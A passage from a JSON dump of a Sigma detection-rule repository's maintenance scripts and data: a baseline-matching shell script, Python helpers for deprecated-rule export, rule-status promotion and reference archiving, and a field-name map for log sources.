baseline\"\n}&\npids+=($!)\nPID2OS[$!]=$OS\n\n# Sync with all background jobs\nfor pid in ${pids[*]}; do\n    echo \"===>  Waiting for PID $pid / ${PID2OS[$pid]}\"\n    wait $pid\ndone\n\necho\necho \"###############\"\necho \"##  MATCHES  ##\"\necho \"###############\"\necho\necho \"Windows 7 32-bit:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win7.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 10:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win10.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 11:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win11.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 11 2023:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win11-2023.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho 
\"Windows 2022:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 2022 AD:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022-ad.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\necho\necho \"Windows 2022.0.20348 Azure:\"\n\"${SIGMA}\"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json \"${SIGMA}\"/.github/workflows/known-FPs.csv\n\necho\nread -p  \"Removing temporary directory ${TMP}. Press Enter to continue.\" -s\necho\nrm -r \"${TMP}\"\necho \"Removed ${TMP}\"\necho \"Finished\"\n"
  },
  {
    "path": "tests/deprecated_rules.py",
    "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreate the summary of all the deprecated rules in deprecated.csv or deprecated.json\n\nRun using the command\n# python deprecated_rules.py --format {json, csv}\n\"\"\"\n\nfrom sigma.collection import SigmaCollection\nfrom sigma.rule import SigmaStatus, SigmaLevel\n\nimport argparse\nimport csv\nimport json\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-f\", \"--format\", choices=[\"csv\", \"json\"], default=\"csv\")\nargs = parser.parse_args()\n\npath_to_rules = [\n    \"deprecated\",\n]\n\n\ndef get_level(rule):\n    return rule.level if rule.status else SigmaLevel.MEDIUM\n\n\ndef get_modified_time(rule):\n    return rule.modified if rule.modified else rule.date\n\n\ndef format_rule(rule):\n    return {\n        \"id\": str(rule.id),\n        \"title\": rule.title,\n        \"date\": str(rule.date),\n        \"modified\": str(get_modified_time(rule)),\n        \"level\": str(get_level(rule)),\n    }\n\n\ndef save_file(rules, _format):\n    is_rule_deprecated = lambda rule: rule.status is SigmaStatus.DEPRECATED\n    filename_export = f\"./deprecated/deprecated.{_format}\"\n\n    raw_info = map(format_rule, filter(is_rule_deprecated, rules))\n    sort_info_secondary = sorted(raw_info, key=lambda d: d[\"id\"])\n    sort_info = sorted(sort_info_secondary, key=lambda d: d[\"modified\"])\n\n    with open(filename_export, encoding=\"UTF-8\", mode=\"w\", newline=\"\") as _file:\n        if _format == \"csv\":\n            fieldnames = [\"id\", \"title\", \"date\", \"modified\", \"level\"]\n            writer = csv.DictWriter(_file, fieldnames=fieldnames)\n            writer.writeheader()\n            writer.writerows(sort_info)\n        elif _format == \"json\":\n            json.dump(sort_info, _file, indent=4)\n\n\nif __name__ == \"__main__\":\n\n    rule_paths = SigmaCollection.resolve_paths(path_to_rules)\n    rule_collection = SigmaCollection.load_ruleset(rule_paths, 
collect_errors=True)\n    save_file(rule_collection, args.format)\n"
  },
  {
    "path": "tests/logsource.json",
    "content": "{\n    \"title\": \"Field name by logsource\",\n    \"version\": \"20251205\",\n    \"legit\":{\n        \"windows\":{\n            \"common\": [\"EventID\", \"Provider_Name\",\"Channel\",\"Computer\",\"Security_UserID\"],\n            \"empty\": [],\n            \"category\":{\n                \"process_creation\": [\"CommandLine\", \"Company\", \"CurrentDirectory\", \"Description\", \"FileVersion\",\n                                    \"Hashes\", \"Image\", \"IntegrityLevel\", \"LogonGuid\", \"LogonId\", \"OriginalFileName\",\n                                    \"ParentCommandLine\", \"ParentImage\", \"ParentProcessGuid\", \"ParentProcessId\",\n                                    \"ParentUser\", \"ProcessGuid\", \"ProcessId\", \"Product\", \"TerminalSessionId\", \"User\", \"GrandParentImage\"],\n                \"file_change\": [\"CreationUtcTime\", \"Image\", \"PreviousCreationUtcTime\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"network_connection\": [\"DestinationHostname\", \"DestinationIp\", \"DestinationIsIpv6\", \"DestinationPort\",\n                                    \"DestinationPortName\", \"Image\", \"Initiated\", \"ProcessGuid\", \"ProcessId\", \"Protocol\", \"SourceHostname\",\n                                    \"SourceIp\", \"SourceIsIpv6\", \"SourcePort\", \"SourcePortName\", \"User\", \"ParentImage\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\", \"SchemaVersion\", \"State\", \"Version\"],\n                \"process_termination\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"driver_load\":[\"Hashes\", \"ImageLoaded\", \"Signature\", \"SignatureStatus\", \"Signed\"],\n                \"image_load\":[\"Company\", \"Description\", \"FileVersion\", \"Hashes\", \"Image\", \"ImageLoaded\", \"OriginalFileName\", \"ProcessGuid\",\n                            \"ProcessId\", \"Product\", \"Signature\", \"SignatureStatus\", 
\"Signed\", \"User\"],\n                \"create_remote_thread\":[\"NewThreadId\", \"SourceImage\", \"SourceProcessGuid\", \"SourceProcessId\", \"SourceUser\", \"StartAddress\",\n                                        \"StartFunction\", \"StartModule\", \"TargetImage\", \"TargetProcessGuid\", \"TargetProcessId\", \"TargetUser\"],\n                \"raw_access_thread\":[\"Device\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"process_access\":[\"CallTrace\", \"GrantedAccess\", \"SourceImage\", \"SourceProcessGUID\", \"SourceProcessId\", \"SourceThreadId\",\n                                \"SourceUser\", \"TargetImage\", \"TargetProcessGUID\", \"TargetProcessId\", \"TargetUser\"],\n                \"raw_access_read\":[\"CreationUtcTime\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"file_event\":[\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"file_executable_detected\":[\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"Hashes\", \"User\"],\n                \"registry_add\":[\"EventType\", \"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetObject\", \"User\"],\n                \"registry_delete\":[\"Details\", \"EventType\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\"],\n                \"registry_set\":[\"Details\", \"EventType\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"registry_rename\":[\"EventType\", \"Image\", \"NewName\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"registry_event\":[\"Details\", \"EventType\", \"Image\", \"NewName\", \"ProcessGuid\", \"ProcessId\", \"TargetObject\", \"User\"],\n                \"create_stream_hash\":[\"Contents\", \"CreationUtcTime\", \"Hash\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"pipe_created\":[\"EventType\", 
\"Image\", \"PipeName\", \"ProcessGuid\", \"ProcessId\", \"User\"],\n                \"wmi_event\":[\"Consumer\", \"Destination\", \"EventNamespace\", \"EventType\", \"Filter\", \"Name\", \"Operation\", \"Query\", \"Type\", \"User\"],\n                \"dns_query\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"QueryName\", \"QueryResults\", \"QueryStatus\", \"User\"],\n                \"file_delete\":[\"Archived\", \"Hashes\", \"Image\", \"IsExecutable\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"clipboard_capture\":[\"Archived\", \"ClientInfo\", \"Hashes\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"Session\", \"User\"],\n                \"process_tampering\":[\"Image\", \"ProcessGuid\", \"ProcessId\", \"Type\", \"User\"],\n                \"file_block\":[\"Hashes\", \"Image\", \"ProcessGuid\", \"ProcessId\", \"TargetFilename\", \"User\"],\n                \"ps_module\":[\"ContextInfo\", \"UserData\", \"Payload\"],\n                \"ps_script\":[\"MessageNumber\", \"MessageTotal\", \"ScriptBlockText\", \"ScriptBlockId\", \"Path\"],\n                \"file_access\":[\"Irp\", \"FileObject\", \"IssuingThreadId\", \"CreateOptions\", \"CreateAttributes\", \"ShareAccess\", \"FileName\"],\n                \"file_rename\":[\"Irp\", \"FileObject\", \"FileKey\", \"ExtraInformation\", \"IssuingThreadId\", \"InfoClass\", \"FilePath\"],\n                \"ps_classic_start\":[],\n                \"ps_classic_provider_start\":[],\n                \"sysmon_error\":[]\n            },\n            \"service\":{\n                \"bitlocker\": [\"VolumeName\", \"VolumeMountPoint\", \"ProtectorGUID\", \"ProtectorType\"],\n                \"bits-client\":[\"RemoteName\", \"LocalName\", \"processPath\", \"processId\"],\n                \"codeintegrity-operational\":[\"FileNameLength\", \"FileNameBuffer\", \"ProcessNameLength\", \"ProcessNameBuffer\",\n                                            \"RequestedPolicy\", \"ValidatedPolicy\", 
\"Status\"],\n                \"diagnosis-scripted\": [\"PackagePath\", \"PackageId\"],\n                \"firewall-as\":[\"Action\", \"ApplicationPath\", \"ModifyingApplication\"],\n                \"ldap\":[\"ScopeOfSearch\", \"SearchFilter\", \"DistinguishedName\", \"AttributeList\", \"ProcessId\"],\n                \"ntlm\":[\"CallerPID\", \"ClientDomainName\", \"ClientLUID\", \"ClientUserName\", \"DomainName\", \"MechanismOID\",\n                        \"ProcessName\", \"SChannelName\", \"SChannelType\", \"TargetName\", \"UserName\", \"WorkstationName\"],\n                \"openssh\":[\"process\", \"payload\"],\n                \"security-mitigations\":[\"ProcessPathLength\", \"ProcessPath\", \"ProcessCommandLineLength\", \"ProcessCommandLine\",\n                                        \"ProcessId\", \"ProcessCreateTime\", \"ProcessStartKey\", \"ProcessSignatureLevel\",\n                                        \"ProcessSectionSignatureLevel\", \"ProcessProtection\", \"TargetThreadId\", \"TargetThreadCreateTime\",\n                                        \"RequiredSignatureLevel\", \"SignatureLevel\", \"ImageNameLength\", \"ImageName\"],\n                \"shell-core\":[\"Name\", \"AppID\", \"Flags\"],\n                \"smbclient-security\":[\"Reason\", \"Status\", \"ShareNameLength\", \"ShareName\", \"ObjectNameLength\", \"ObjectName\",\n                                    \"UserNameLength\", \"UserName\", \"ServerNameLength\", \"ServerName\"],\n                \"smbclient-connectivity\":[],\n                \"smbserver-connectivity\":[],\n                \"taskscheduler\":[\"TaskName\", \"UserContext\", \"Path\", \"ProcessID\", \"Priority\", \"UserName\"],\n                \"terminalservices-localsessionmanager\":[\"User\", \"SessionID\", \"Address\"],\n                \"iis\":[\"date\", \"time\", \"c-ip\", \"cs-username\", \"s-sitename\", \"s-computername\", \"s-ip\", \"cs-method\",\n                        \"cs-uri-stem\", \"cs-uri-query\", \"s-port\", 
\"cs-method\", \"sc-status\", \"sc-win32-status\",\n                        \"sc-bytes\", \"cs-bytes\", \"time-taken\", \"cs-version\", \"cs-host\", \"cs-user-agent\",\n                        \"cs-referer\", \"cs-cookie\"],\n                \"application\":[],\n                \"sysmon\":[],\n                \"powershell\":[],\n                \"powershell-classic\":[],\n                \"security\":[],\n                \"system\":[],\n                \"windefend\":[],\n                \"wmi\":[],\n                \"microsoft-servicebus-client\":[],\n                \"printservice-operational\":[],\n                \"driver-framework\":[],\n                \"dns-server-analytic\":[],\n                \"dns-server\":[],\n                \"printservice-admin\":[],\n                \"msexchange-management\":[],\n                \"applocker\":[],\n                \"vhdmp\":[],\n                \"appxdeployment-server\":[\"Path\", \"AppId\", \"FilePath\", \"ErrorCode\", \"DeploymentOperation\", \"PackageFullName\", \"PackageSourceUri\", \"PackageDisplayName\", \"CallingProcess\",\"Flags\", \"HasFullTrust\"],\n                \"appxpackaging-om\":[\"subjectName\"],\n                \"lsa-server\":[\"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"TargetLogonGuid\", \"EventOrginal\", \"EventCountTotal\", \"SidList\"],\n                \"dns-client\":[\"QueryName\", \"QueryType\", \"QueryOptions\", \"QueryStatus\", \"QueryResults\", \"NetworkIndex\", \"InterfaceIndex\", \"Status\", \"ClientPID\", \"QueryBlob\", \"DnsServerIpAddress\", \"ResponseStatus\", \"SendBlob\", \"SendBlobContext\", \"AddressLength\", \"Address\"],\n                \"appmodel-runtime\":[\"ProcessID\", \"PackageName\", \"ImageName\", \"ApplicationName\", \"Message\"],\n                \"capi2\":[],\n                \"certificateservicesclient-lifecycle-system\":[],\n                \"iis-configuration\":[ 
\"PhysicalPath\",\"ConfigPath\",\"EffectiveLocationPath\",\"Configuration\",\"TokenCacheModule\",\"EditOperationType\",\"OldValue\",\"NewValue\"]\n            }\n        },\n        \"linux\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"process_creation\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\",\n                                    \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\",\n                                    \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"],\n                \"network_connection\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\", \"Protocol\", \"Initiated\", \"SourceIsIpv6\", \"SourceIp\", \"SourceHostname\",\n                                    \"SourcePort\", \"SourcePortName\", \"DestinationIsIpv6\", \"DestinationIp\", \"DestinationHostname\", \"DestinationPort\",\n                                    \"DestinationPortName\"],\n                \"process_termination\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\"],\n                \"raw_access_read\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"Device\", \"User\"],\n                \"file_event\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\"],\n                \"file_delete\": [\"ProcessGuid\", \"ProcessId\", \"User\", \"Image\", \"TargetFilename\", \"Hashes\", \"IsExecutable\", \"Archived\"]\n            },\n            \"service\":{\n                \"auditd\": [\"a0\", \"a1\", \"a2\", \"a3\", \"a4\", \"a5\", \"a6\", \"a7\", \"a8\", \"a9\",\n                    \"acct\", \"acl\", \"action\", \"added\", \"addr\", \"apparmor\", \"arch\", \"argc\", 
\"audit_backlog_limit\", \"audit_backlog_wait_time\",\n                    \"audit_enabled\", \"audit_failure\", \"auid\", \"banners\", \"bool\", \"bus\", \"cap_fe,cap_fi\", \"cap_fp\", \"cap_fver\", \"cap_pa\", \"cap_pe\", \"cap_pi\",\n                    \"cap_pp\", \"capability\", \"category\", \"cgroup\", \"changed\", \"cipher\", \"class\", \"cmd\", \"code\", \"comm\", \"compat\", \"cwd\", \"daddr\", \"data\",\n                    \"default-context\", \"dev\", \"dev\", \"device\", \"dir\", \"direction\", \"dmac\", \"dport\", \"egid\", \"enforcing\", \"entries\", \"errno\", \"euid\", \"exe\",\n                    \"exit\", \"fam\", \"family\", \"fd\", \"fe\", \"feature\", \"fi\", \"file\", \"flags\", \"format\", \"fp\", \"fsgid\", \"fsuid\", \"fver\", \"gid\", \"grantors\", \"grp\",\n                    \"hook\", \"hostname\", \"icmp_type\", \"id\", \"igid\", \"img-ctx\", \"inif\", \"ino\", \"inode\", \"inode_gid\", \"inode_uid\", \"invalid_context\", \"ioctlcmd\",\n                    \"ip\", \"ipid\", \"ipx-net\", \"item\", \"items\", \"iuid\", \"kernel\", \"key\", \"kind\", \"ksize\", \"laddr\", \"len\", \"list\", \"lport\", \"mac\", \"macproto\", \"maj\",\n                    \"major\", \"minor\", \"mode\", \"model\", \"msg\", \"name\", \"nametype\", \"nargs\", \"net\", \"new\", \"new_gid\", \"new_lock\", \"new_pe\", \"new_pi\", \"new_pp\",\n                    \"new-chardev\", \"new-disk\", \"new-enabled\", \"new-fs\", \"new-level\", \"new-log_passwd\", \"new-mem\", \"new-net\", \"new-range\", \"new-rng\", \"new-role\",\n                    \"new-seuser\", \"new-vcpu\", \"nlnk-fam\", \"nlnk-grp\", \"nlnk-pid\", \"oauid\", \"obj\", \"obj_gid\", \"obj_uid\", \"ocomm\", \"oflag\", \"ogid\", \"old\", \"old_enforcing\",\n                    \"old_lock\", \"old_pa\", \"old_pe\", \"old_pi\", \"old_pp\", \"old_prom\", \"old_val\", \"old-auid\", \"old-chardev\", \"old-disk\", \"old-enabled\", \"old-fs\",\n                    \"old-level\", \"old-log_passwd\", 
\"old-mem\", \"old-net\", \"old-range\", \"old-rng\", \"old-role\", \"old-ses\", \"old-seuser\", \"old-vcpu\", \"op\", \"opid\",\n                    \"oses\", \"ouid\", \"outif\", \"pa\", \"parent\", \"path\", \"pe\", \"per\", \"perm\", \"perm_mask\", \"permissive\", \"pfs\", \"pi\", \"pid\", \"pp\", \"ppid\", \"printer\",\n                    \"proctitle\", \"prom\", \"proto\", \"qbytes\", \"range\", \"rdev\", \"reason\", \"removed\", \"res\", \"resrc\", \"result\", \"role\", \"rport\", \"saddr\", \"sauid\",\n                    \"scontext\", \"selected-context\", \"seperm\", \"seperms\", \"seqno\", \"seresult\", \"ses\", \"seuser\", \"sgid\", \"sig\", \"sigev_signo\", \"smac\", \"spid\",\n                    \"sport\", \"state\", \"subj\", \"success\", \"suid\", \"syscall\", \"SYSCALL\", \"table\", \"tclass\", \"tcontext\", \"terminal\", \"tty\", \"type\", \"uid\", \"unit\", \"uri\", \"user\",\n                    \"uuid\", \"val\", \"val\", \"ver\", \"virt\", \"vm\", \"vm-ctx\", \"vm-pid\", \"watch\"],\n                \"vsftpd\":[],\n                \"sshd\":[],\n                \"syslog\":[],\n                \"guacamole\":[],\n                \"auth\":[],\n                \"clamav\":[],\n                \"modsecurity\":[],\n                \"sudo\":[],\n                \"cron\":[]\n            }\n        },\n        \"empty\":{\n            \"common\": [],\n            \"empty\": [\"not_found\"],\n            \"category\":{\n                \"proxy\":[\"c-uri\", \"c-uri-extension\", \"c-uri-query\", \"c-uri-stem\", \"c-useragent\", \"cs-bytes\", \"cs-cookie\",\n                        \"cs-host\", \"cs-method\", \"cs-uri-stem\", \"r-dns\", \"cs-referrer\", \"cs-version\", \"sc-bytes\", \"sc-status\", \"src_ip\", \"dst_ip\",\n                        \"cs-uri\"],\n                \"webserver\":[\"date\", \"time\", \"c-ip\", \"cs-username\", \"s-sitename\", \"s-computername\", \"s-ip\", \"cs-method\",\n                            \"cs-uri-stem\", 
\"cs-uri-query\", \"s-port\", \"cs-method\", \"sc-status\", \"sc-win32-status\",\n                            \"sc-bytes\", \"cs-bytes\", \"time-taken\", \"cs-version\", \"cs-host\", \"cs-user-agent\",\n                            \"cs-referer\", \"cs-cookie\"],\n                \"antivirus\":[],\n                \"database\":[],\n                \"dns\":[],\n                \"firewall\":[]\n            },\n            \"service\":{\n                \"apache\":[],\n                \"netflow\":[],\n                \"nginx\":[]\n            }\n        },\n        \"cisco\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"aaa\":[],\n                \"bgp\":[],\n                \"duo\":[],\n                \"ldp\":[],\n                \"syslog\":[]\n            }\n        },\n        \"fortigate\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"event\":[\"devname\",\"devid\",\"logid\",\"type\",\"subtype\",\"level\",\"vd\",\"logdesc\",\"user\",\"ui\",\"action\",\"cfgtid\",\"cfgpath\",\"cfgobj\",\"cfgattr\",\"msg\"]\n            }\n        },\n        \"fortios\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"sslvpnd\": []\n            }\n        },\n        \"paloalto\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"file_event\": []\n            },\n            \"service\":{\n                \"globalprotect\": []\n            }\n        },\n        \"django\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"kubernetes\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n            
    \"application\":[]\n            },\n            \"service\":{\n                \"audit\": []\n            }\n        },\n        \"python\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"qualys\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"rpc_firewall\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"ruby_on_rails\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"modsecurity\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"spring\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"sql\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"jvm\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"nodejs\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"opencanary\":{\n            \"common\": [],\n            
\"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"velocity\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"application\":[]\n            },\n            \"service\":{}\n        },\n        \"aws\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"cloudtrail\":[]\n            }\n        },\n        \"azure\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"activitylogs\":[],\n                \"auditlogs\":[],\n\t\t\t\t\"riskdetection\":[],\n\t\t\t\t\"pim\":[],\n                \"signinlogs\":[]\n            }\n        },\n        \"gcp\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"gcp.audit\":[],\n                \"google_workspace.admin\":[]\n            }\n        },\n        \"github\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[]\n            }\n        },\n        \"bitbucket\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[]\n            }\n        },\n        \"m365\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"audit\":[],\n                \"exchange\":[],\n                \"threat_detection\":[],\n                \"threat_management\":[]\n            }\n        },\n        \"okta\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"okta\":[]\n            }\n        },\n        
\"onelogin\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"onelogin.events\":[]\n            }\n        },\n        \"huawei\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"bgp\":[]\n            }\n        },\n        \"juniper\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{},\n            \"service\":{\n                \"bgp\":[]\n            }\n        },\n        \"zeek\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n            },\n            \"service\":{\n                \"kerberos\":[],\n                \"smb_files\":[],\n                \"rdp\":[],\n                \"http\":[],\n                \"dns\":[],\n                \"dce_rpc\":[],\n                \"x509\":[]\n            }\n        },\n        \"macos\":{\n            \"common\": [],\n            \"empty\": [],\n            \"category\":{\n                \"process_creation\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\",\n                                    \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\",\n                                    \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"],\n                \"network_connection\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\", \"Protocol\", \"Initiated\", \"SourceIsIpv6\", \"SourceIp\", \"SourceHostname\",\n                                    \"SourcePort\", \"SourcePortName\", \"DestinationIsIpv6\", \"DestinationIp\", \"DestinationHostname\", \"DestinationPort\",\n                                    \"DestinationPortName\"],\n                \"process_termination\": 
[\"ProcessGuid\", \"ProcessId\", \"Image\", \"User\"],\n                \"raw_access_read\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"Device\", \"User\"],\n                \"file_event\": [\"ProcessGuid\", \"ProcessId\", \"Image\", \"TargetFilename\", \"CreationUtcTime\", \"User\"],\n                \"sysmon_status\": [\"Configuration\", \"ConfigurationFileHash\"],\n                \"file_delete\": [\"ProcessGuid\", \"ProcessId\", \"User\", \"Image\", \"TargetFilename\", \"Hashes\", \"IsExecutable\", \"Archived\"]\n            },\n            \"service\":{\n            }\n        }    \n    },\n    \"addon\":{\n        \"windows\":{\n            \"category\":{\n                \"process_creation\": [\"GrandparentCommandLine\"],\n                \"network_connection\": [\"CommandLine\", \"ParentImage\"],\n                \"create_remote_thread\": [\"User\", \"SourceCommandLine\", \"SourceParentProcessId\", \"SourceParentImage\",\n                                    \"SourceParentCommandLine\", \"TargetCommandLine\", \"TargetParentProcessId\", \"TargetParentImage\", \"TargetParentCommandLine\",\n                                    \"IsInitialThread\", \"RemoteCreation\"],\n                \"file_delete\": [\"CommandLine\", \"ParentImage\", \"ParentCommandLine\"],\n                \"file_event\": [\"CommandLine\", \"IntegrityLevel\", \"MagicHeader\", \"ParentCommandLine\", \"ParentImage\"],\n                \"image_load\": [\"CommandLine\"],\n                \"process_access\": [\"SourceCommandLine\", \"CallTraceExtended\"],\n                \"file_access\":[\"Image\", \"CommandLine\", \"ParentImage\", \"ParentCommandLine\", \"User\", \"TargetFilename\"],\n                \"file_rename\":[\"Image\", \"CommandLine\", \"ParentImage\", \"ParentCommandLine\", \"User\", \"OriginalFileName\", \"SourceFilename\", \"TargetFilename\", \"MagicHeader\"]\n            },\n            \"service\":{}\n        },\n        \"empty\":{\n            \"category\":{\n                
\"webserver\": [\"cs-content-type\"]\n               },\n            \"service\":{}\n        }\n    }\n}"
  },
  {
    "path": "tests/promote_rules_status.py",
    "content": "from datetime import datetime\nfrom sigma.collection import SigmaCollection\n\npath_to_rules = [\n    \"rules\",\n    \"rules-emerging-threats\",\n    \"rules-placeholder\",\n    \"rules-threat-hunting\",\n    \"rules-compliance\",\n]\nnb_days = 300\n\n\ndef get_rules_to_promote():\n    today = datetime.now().date()\n    rules_to_promote = []\n\n    rule_paths = SigmaCollection.resolve_paths(path_to_rules)\n    rule_collection = SigmaCollection.load_ruleset(rule_paths, collect_errors=True)\n    for sigmaHQrule in rule_collection:\n        if str(sigmaHQrule.status) == \"experimental\":\n            last_update = (\n                sigmaHQrule.modified if sigmaHQrule.modified else sigmaHQrule.date\n            )\n            difference = (today - last_update).days\n            if difference >= nb_days:\n                rules_to_promote.append(sigmaHQrule.source.path)\n\n    return rules_to_promote\n\n\ndef promote_rules(rules_to_promote):\n    for file_ in rules_to_promote:\n        with open(file_, \"r\", encoding=\"utf8\") as f:\n            data = f.read().replace(\"\\nstatus: experimental\", \"\\nstatus: test\")\n\n        with open(file_, \"w\", encoding=\"utf8\") as f:\n            f.write(data)\n\n\nif __name__ == \"__main__\":\n    rules_to_promote = get_rules_to_promote()\n    promote_rules(rules_to_promote)\n"
  },
  {
    "path": "tests/reference-archiver.py",
    "content": "# Author:\n#    Martin Spielmann / KION Group IT\n#    Nasreddine Bencherchali / Nextron Systems\n\n__version__ = \"0.0.1\"\n\nimport time\nimport requests\nimport yaml\nimport os\nfrom datetime import datetime\nfrom typing import Generator\n\n\nWEB_ARCHIVE_SAVE_URL = \"https://web.archive.org/save/\"\nWEB_ARCHIVE_GET_URL = \"https://web.archive.org/web/\"\n\nwith open(\"tests/rule-references.txt\", \"r\") as f:\n    RULE_REFERENCES = [i.strip() for i in f.readlines()]\n\npath_to_rules = [\n    \"rules\",\n    \"rules-emerging-threats\",\n    \"rules-placeholder\",\n    \"rules-threat-hunting\",\n    \"rules-compliance\",\n]\n\n\n# Helper functions\ndef yield_next_rule_file_path(path_to_rules: list) -> Generator[str, None, None]:\n    for path_ in path_to_rules:\n        for root, _, files in os.walk(path_):\n            for file in files:\n                if file.endswith(\".yml\"):\n                    yield os.path.join(root, file)\n\n\ndef get_rule_part(file_path: str, part_name: str):\n    yaml_dicts = get_rule_yaml(file_path)\n    for yaml_part in yaml_dicts:\n        if part_name in yaml_part.keys():\n            return yaml_part[part_name]\n\n    return None\n\n\ndef get_rule_yaml(file_path: str) -> dict:\n    data = []\n\n    with open(file_path, encoding=\"utf-8\") as f:\n        yaml_parts = yaml.safe_load_all(f)\n        for part in yaml_parts:\n            data.append(part)\n\n    return data\n\n\ndef get_references(path_to_rules):\n    ref_list = []\n\n    for file in yield_next_rule_file_path(path_to_rules):\n        references = get_rule_part(file_path=file, part_name=\"references\")\n        if references:\n            for ref in references:\n                # To avoid references using \"Internal Research\" or similar\n                if ref.startswith(\"http\"):\n                    ref_list.append(ref)\n    return ref_list\n\n\ndef archive_references(ref_list):\n    error_archiving = []\n    already_archived = []\n    
